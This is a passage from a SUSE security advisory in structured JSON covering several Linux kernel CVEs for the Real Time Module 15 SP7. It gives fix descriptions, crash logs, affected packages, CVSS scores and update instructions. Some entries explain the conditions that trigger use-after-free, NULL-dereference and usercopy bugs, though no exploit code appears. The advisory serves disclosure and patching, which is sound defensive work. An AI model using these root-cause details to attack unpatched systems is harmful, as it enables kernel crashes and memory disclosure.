"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
